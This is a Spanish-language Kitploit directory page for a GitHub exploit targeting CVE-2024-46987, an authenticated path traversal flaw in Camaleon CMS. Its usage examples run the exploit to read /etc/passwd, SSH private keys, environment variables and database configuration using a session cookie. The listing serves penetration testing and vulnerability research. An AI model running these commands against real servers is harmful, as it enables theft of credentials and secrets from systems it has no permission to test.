Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-46987 — CVE-2024-46987 - Camaleon CMS LFI Exploit | Kitploit
Herramientas/GitHubGitHub/rival420/cve-2024-46987
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubrival420/cve-2024-46987

CVE-2024-46987

CVE-2024-46987 - Camaleon CMS LFI Exploit

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-46987 - Inclusión Local de Archivos en Camaleon CMS

Exploit de Inclusión Local de Archivos (LFI) autenticado para Camaleon CMS.

Vulnerabilidad

Camaleon CMS es vulnerable a un ataque LFI autenticado a través del endpoint /admin/media/download_private_file. El parámetro file no se sanitiza adecuadamente, lo que permite path traversal para leer archivos arbitrarios del servidor.

Versiones Afectadas

  • Camaleon CMS < 2.8.2

Requisitos

root@kitploit:~
pip install requests

Uso

root@kitploit:~
# Print file to terminal (default)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"

# Save to file
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt

Parámetros

Ejemplos

root@kitploit:~
# Read passwd file
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"

# Read SSH keys
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa

# Read environment variables
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"

# Read application config
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"

Aviso Legal

Esta herramienta está destinada exclusivamente a pruebas de seguridad autorizadas y fines educativos. Úsela solo en sistemas para los que tenga permiso explícito para realizar pruebas.

Referencias

  • CVE-2024-46987
  • Camaleon CMS
Descargar herramienta
ParámetroDescripción
-u, --urlURL objetivo
-f, --fileArchivo a leer (ej., /etc/passwd)
-t, --tokenValor de la cookie auth_token
-o, --outputNombre del archivo de salida (opcional, imprime en terminal si no se establece)